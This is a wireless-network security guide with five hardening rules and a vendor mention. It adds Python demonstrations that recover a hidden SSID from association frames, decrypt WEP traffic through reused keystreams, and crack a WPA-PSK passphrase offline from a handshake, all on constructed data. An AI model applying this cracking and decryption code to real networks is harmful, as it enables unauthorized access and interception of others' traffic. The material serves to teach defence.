Security Café Reading Room
More Than Passwords: Five Rules to Ward off Wireless Pests

College students do it. Coffee shop customers do it, too. Your neighbors in the business park are probably doing it right now.

Many computer users search for an available wireless network to tap into—whether at the mall, at school, home, or work—and whether they have permission to use that network or not. Knowingly or unknowingly, these wireless parasites may be doing more than swiping a signal. When they connect, they can open up your network—and all the computers on it—to an array of security breaches.

Authorized access, two times the hacking
One 2006 survey found that roughly 36 percent of businesses allow some staff to access their systems from a remote location, e.g., from home or over a wireless hot spot. Four-fifths of large businesses allow this. Interestingly, respondents who allow remote access are twice as likely as those who do not to report that an unauthorized outsider has tried to break into their network, and they are also more likely to have experienced an actual penetration.

These problems are compounded when someone who is allowed to use an organization's wireless network plugs in an unauthorized access point of their own to extend the main network's coverage. These rogue access points are a weak point: they typically bypass whatever security measures the main network enforces, while still being wired into it.

Passwords do not pass muster
At home, people usually use passwords to protect their wireless networks from unauthorized access. And passwords are still the main way of authenticating users on business networks. But passwords are woefully inadequate for remote and mobile computer users, particularly for wireless.


Now, a study by the University of Maryland (UM) seems to confirm this, indicating that passwords alone may not provide enough protection for wireless networks. And they are particularly inadequate for the wireless networks of larger organizations.

For many organizations and sites, thousands of users legitimately access widespread wireless networks at any given time. But in turn, some of these users set up their own wireless networks, linked to the official network, to improve the signal in their offices or homes. This is what security practitioners call an unmanaged, or rogue, wireless access point.

"If these secondary connections are not secure, they open up the entire network to trouble," says Michel Cukier, assistant professor in the UM reliability engineering program. "Unsecured wireless access points pose problems for businesses, cities, and other organizations that make wireless access available to customers, employees, and residents. Unsecured connections are an open invitation to hackers seeking access to vulnerable computers."

Five rules
Wireless network owners and administrators can take the following five precautions to keep out parasites trolling for access and to contain the unsecured connections that legitimate users set up for themselves:

  1. Signal coverage

     Limit the transmit power and antenna placement of your access points so that the network cannot be detected outside the bounds of your office. Treat this as reducing casual exposure rather than as a hard boundary: a high-gain directional antenna picks up a signal far too weak for an ordinary laptop to see, so coverage limits never substitute for encryption.

  2. SSID broadcasting

     The Service Set IDentifier (SSID) is the name of a wireless network. Access points advertise it in their beacon frames, and clients quote it in the probe and association requests they send when they join. When SSID broadcasting is enabled, the network shows up in the network list of every wireless client within range. When it is disabled, the access point sends an empty SSID in its beacons, so the network is invisible to casual users unless the name has been entered in advance in the client's network settings. It stays visible to anyone with a sniffer, because the name still crosses the air in the clear every time a client connects, so do not count hiding the SSID as a security control. Do change the SSID from the manufacturer's default, and do not make it something obvious like your company name: an obvious name tells an attacker whose network it is, and because the SSID is the salt for WPA/WPA2 pre-shared keys, common names have precomputed cracking tables.

  3. WPA/WEP encryption

     Encrypting the traffic protects confidential information from disclosure: an attacker must recover the encryption key before reading anything sent over the network. Two families of schemes are available, Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). In practice an access point uses one of them at a time for a given SSID, so pick the strongest mode all of your clients support.

     Do not use WEP. Its RC4 keystream repeats after a modest number of packets and its key is recovered in minutes with freely available software. Use WPA or, preferably, WPA2 (the certified form of IEEE 802.11i, which adds AES-CCMP), and ensure that users always operate with it switched on; many access points ship with encryption switched off by default.

  4. Key management

     Even with strong encryption, a key that is never changed gives an attacker unlimited time to crack it. WEP shares one static key among every device. WPA and WPA2 derive fresh session keys each time a client associates, but in their pre-shared-key (personal) mode the master passphrase is itself static and known to every user, and a single captured handshake is enough to attack it offline with a dictionary. Choose a long random passphrase, change it whenever staff leave or a laptop goes missing, and in a larger organization use WPA/WPA2 Enterprise (IEEE 802.1X with a RADIUS server), which gives each user individual credentials and keys that can be revoked one at a time.

  5. MAC addresses

     Another option is to implement media access control (MAC) filtering. A MAC address is a serial number unique to each manufactured network adapter, so restricting the access point to adapters you have authorized blocks devices you have never seen. It is a weak control on its own: MAC addresses travel unencrypted in the header of every frame, so an attacker sniffing the channel learns the addresses of legitimate computers within minutes and can clone one. Use filtering to turn away casual parasites and to keep an inventory of devices, not in place of encryption and authentication.
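Rule 2 says a hidden SSID is invisible only to casual users. The following added example (written for this page; it is not code from the original article or from Check Point) shows why: it parses 802.11 management frames and recovers the "hidden" name from the association request a client sends in the clear. The access point and client MAC addresses, the network name and the frame contents are all constructed for the demonstration.

```python
import struct

# 802.11 management-frame subtypes (frame-control byte 0: subtype in the high
# nibble, frame type in bits 2-3; type 0 = management).
BEACON, PROBE_RESP, ASSOC_REQ = 0x8, 0x5, 0x0
# Length of the fixed fields that precede the tagged parameters per subtype.
FIXED_LEN = {BEACON: 12, PROBE_RESP: 12, ASSOC_REQ: 4}
TAG_SSID = 0  # element ID of the SSID information element


def build_mgmt(subtype, da, sa, bssid, fixed, ies):
    """Assemble a management frame: 24-byte header, fixed fields, then the
    tagged parameters as (element id, length, value) triples."""
    hdr = bytes([subtype << 4, 0x00]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00"
    body = b"".join(bytes([tag, len(val)]) + val for tag, val in ies)
    return hdr + fixed + body


def parse_mgmt(frame):
    """Return (subtype, source address, BSSID, tagged parameters)."""
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:
        raise ValueError("not a management frame")
    subtype = fc0 >> 4
    sa, bssid = frame[10:16], frame[16:22]
    ies = frame[24 + FIXED_LEN[subtype]:]
    tags, i = {}, 0
    while i + 2 <= len(ies):
        tag, length = ies[i], ies[i + 1]
        tags[tag] = ies[i + 2:i + 2 + length]
        i += 2 + length
    return subtype, sa, bssid, tags


def ssid_of(frame):
    """SSID carried in the frame, or None when the element is empty or nulled,
    which is what 'SSID broadcasting disabled' actually looks like on the air."""
    _, _, _, tags = parse_mgmt(frame)
    raw = tags.get(TAG_SSID, b"")
    if not raw.strip(b"\x00"):
        return None
    return raw.decode("utf-8", "replace")


def recover_hidden_ssids(frames):
    """Map each BSSID whose beacons hide the SSID to the name revealed by probe
    responses and association requests seen on the same channel."""
    hidden, revealed = set(), {}
    for f in frames:
        subtype, _, bssid, _ = parse_mgmt(f)
        name = ssid_of(f)
        if subtype == BEACON and name is None:
            hidden.add(bssid)
        elif subtype in (PROBE_RESP, ASSOC_REQ) and name is not None:
            revealed[bssid] = name
    return {b.hex(":"): revealed[b] for b in hidden if b in revealed}


# Constructed sample capture (not real traffic): an AP that hides its SSID and a
# client that joins it anyway.
AP = bytes.fromhex("001122334455")
CLIENT = bytes.fromhex("66778899aabb")
BCAST = b"\xff" * 6
BEACON_FIXED = struct.pack("<QHH", 0, 100, 0x0411)   # timestamp, interval, capability
ASSOC_FIXED = struct.pack("<HH", 0x0411, 10)         # capability, listen interval
RATES = (1, bytes([0x82, 0x84, 0x8B, 0x96]))          # supported-rates element

HIDDEN_BEACON = build_mgmt(BEACON, BCAST, AP, AP, BEACON_FIXED, [(TAG_SSID, b""), RATES])
ASSOC = build_mgmt(ASSOC_REQ, AP, CLIENT, AP, ASSOC_FIXED, [(TAG_SSID, b"corp-wlan"), RATES])
PROBE = build_mgmt(PROBE_RESP, CLIENT, AP, AP, BEACON_FIXED, [(TAG_SSID, b"corp-wlan")])
CAPTURE = [HIDDEN_BEACON, ASSOC, PROBE]

if __name__ == "__main__":
    print("beacon SSID:", ssid_of(HIDDEN_BEACON))       # None: the network is 'hidden'
    print("recovered:", recover_hidden_ssids(CAPTURE))  # {'00:11:22:33:44:55': 'corp-wlan'}
```

The beacon alone yields nothing, which is all that disabling SSID broadcast buys; the first client to associate hands the name to anyone listening.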
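Rule 3 says WEP "can be decrypted by hackers equipped with special software". The added example below (written for this page, not code from the original article or from Check Point) reproduces the core defect behind that: WEP's 24-bit per-packet IV means the RC4 keystream is reused after a few thousand frames, and two frames under one IV cancel out so that a single known plaintext decrypts the other without the key. The shared key, IV and packet contents are constructed for the demonstration.

```python
import math
import zlib

IV_BITS = 24  # WEP's per-packet initialization vector, sent in the clear


def rc4(key, data):
    """RC4 stream cipher: key scheduling, then XOR the data with the keystream."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(shared_key, iv, plaintext):
    """WEP frame body: IV || key id || RC4(IV || key, plaintext || ICV)."""
    return iv + b"\x00" + rc4(iv + shared_key, plaintext + icv(plaintext))


def wep_decrypt(shared_key, frame):
    iv, body = frame[:3], frame[4:]
    plain = rc4(iv + shared_key, body)
    if icv(plain[:-4]) != plain[-4:]:
        raise ValueError("ICV mismatch")
    return plain[:-4]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def recover_with_known_plaintext(frame_known, plaintext_known, frame_target):
    """Two frames under the same IV share one keystream. Knowing the plaintext of
    one (a predictable ARP or DHCP packet) gives the keystream, which strips the
    other frame. The shared key is never needed; recovery is limited to the
    length of the known plaintext plus its ICV."""
    assert frame_known[:3] == frame_target[:3], "IVs differ: no keystream reuse"
    keystream = xor(frame_known[4:], plaintext_known + icv(plaintext_known))
    body = xor(frame_target[4:], keystream)
    return body[:len(frame_target) - 4 - 4]   # drop header and ICV


def frames_until_iv_collision(p=0.5):
    """Birthday bound: frames to send before some IV repeats with probability p."""
    return math.ceil(math.sqrt(2 * 2 ** IV_BITS * math.log(1 / (1 - p))))


# Constructed demo (not captured traffic). The attacker never sees SHARED_KEY.
SHARED_KEY = bytes.fromhex("0123456789abcdef01")  # 104-bit "WEP-128" key
IV = b"\x0a\x0b\x0c"
KNOWN = (b"\xaa\xaa\x03\x00\x00\x00\x08\x06"        # LLC/SNAP, EtherType ARP
         + b"\x00\x01\x08\x00\x06\x04\x00\x01"       # ARP request, Ethernet/IPv4
         + bytes.fromhex("001122334455") + bytes([10, 0, 0, 1])
         + bytes(6) + bytes([10, 0, 0, 2]))
SECRET = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"login=admin&pw=s3cret"
FRAME_KNOWN = wep_encrypt(SHARED_KEY, IV, KNOWN)
FRAME_TARGET = wep_encrypt(SHARED_KEY, IV, SECRET)   # same IV: keystream reused

if __name__ == "__main__":
    print("IV space:", 2 ** IV_BITS, "frames to 50% collision:", frames_until_iv_collision())
    print("recovered without the key:", recover_with_known_plaintext(FRAME_KNOWN, KNOWN, FRAME_TARGET))
```

The collision count is the optimistic case; real WEP cards reset or increment the IV predictably, and later attacks on RC4's key schedule recover the shared key itself from tens of thousands of frames. Rotating the WEP key, as rule 4 suggests, shortens the window but does not remove the flaw.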

The Check Point approach
Check Point UTM-1 Edge wireless access appliances support security policies utilizing multiple SSIDs, WPA, WPA2, and MAC address filtering. Other security measures such as IPsec over WLAN and RADIUS authentication are also supported.
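Rule 4 warns that a key which is never changed will eventually be cracked. For WPA/WPA2 in pre-shared-key mode that attack is entirely offline, which is why a RADIUS-backed enterprise mode is worth the trouble. The added example below (written for this page; not code from the original article or from Check Point) carries the 802.11i derivation through: PBKDF2 turns the passphrase and SSID into the PSK, the 4-way handshake nonces expand it into the pairwise transient key, and the first 16 bytes of that key authenticate the EAPOL-Key frames. Given one captured handshake, an attacker simply repeats the computation for every word in a list until the MIC matches. The SSID, MAC addresses, nonces, passphrase and word list are constructed for the demonstration; the handshake frame is built here rather than sniffed.

```python
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4) + EAPOL-Key fields that precede the Key MIC (77)


def wpa_psk(passphrase, ssid):
    """802.11i pre-shared key: PBKDF2-HMAC-SHA1, 4096 rounds, the SSID as salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_sha1(key, label, data, nbytes):
    """802.11i PRF-X: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """Pairwise transient key from the PMK and the handshake nonces. For CCMP
    the PTK is 48 bytes and its first 16 bytes are the KCK that keys the MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_sha1(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, eapol_frame):
    """Key MIC for key descriptor version 2: HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_msg2(snonce, mic=bytes(16)):
    """EAPOL-Key message 2 of the 4-way handshake (the RSN IE in the key data
    field is omitted for brevity; it does not change the attack)."""
    body = (b"\x02"                       # descriptor type: RSN
            + b"\x01\x0a"                 # key info: MIC set, pairwise, version 2
            + b"\x00\x10"                 # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"       # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
            + mic + b"\x00\x00")          # key MIC, key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, candidates):
    """Offline dictionary attack: recompute the MIC for each candidate passphrase
    and compare it with the one in the captured frame. After the capture no
    further contact with the network is needed, so rate limiting cannot help."""
    mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + bytes(16) + msg2[MIC_OFFSET + 16:]
    for candidate in candidates:
        ptk = derive_ptk(wpa_psk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], zeroed), mic):
            return candidate
    return None


# Constructed handshake (not a real capture). Nonces are fixed so the example is
# reproducible; in practice all of these values are read off the air.
SSID = "corp-wlan"
AA = bytes.fromhex("001122334455")      # access point MAC
SPA = bytes.fromhex("66778899aabb")     # client MAC
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
TRUE_PASSPHRASE = "Summer2006!"          # what the demo network uses
_kck = derive_ptk(wpa_psk(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
CAPTURED_MSG2 = build_msg2(SNONCE, eapol_mic(_kck, build_msg2(SNONCE)))
WORDLIST = ["password", "corp-wlan", "letmein", "Summer2006!", "wireless"]

if __name__ == "__main__":
    print(crack_psk(SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST))   # Summer2006!
    # The same list fails against another SSID, because the SSID salts the PSK;
    # that is also why rainbow tables exist for default and common names.
    print(crack_psk("corp-wlan-2", AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST))  # None
```

The 4096 PBKDF2 rounds are the only thing slowing this down, so passphrase length and randomness decide whether the attack finishes in seconds or never. Changing the PSK when staff leave invalidates any handshake they, or an attacker, recorded earlier, and enterprise mode removes the shared secret altogether.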


Wireless Security Glossary

Key
Information needed to "unlock" encrypted information.

MAC address
A number that acts like a name for a particular network adapter such as a network card or wireless adapter.

Packets
When information is transmitted from one computer to another, it is often broken up into packets, which can be transmitted faster. These packets are then pieced back together once received.

Service Set IDentifier (SSID)
The name of a wireless network. Access points advertise it in beacon frames and clients send it when probing for or joining the network.

Wi-Fi Protected Access (WPA)
Security standard created to make up for the deficiencies of Wired Equivalent Privacy (WEP); WPA2 is its successor, based on IEEE 802.11i and AES encryption.

Wired Equivalent Privacy (WEP)
Security protocol originally developed to protect wireless networks because such networks broadcast messages using radio and, therefore, are susceptible to eavesdropping.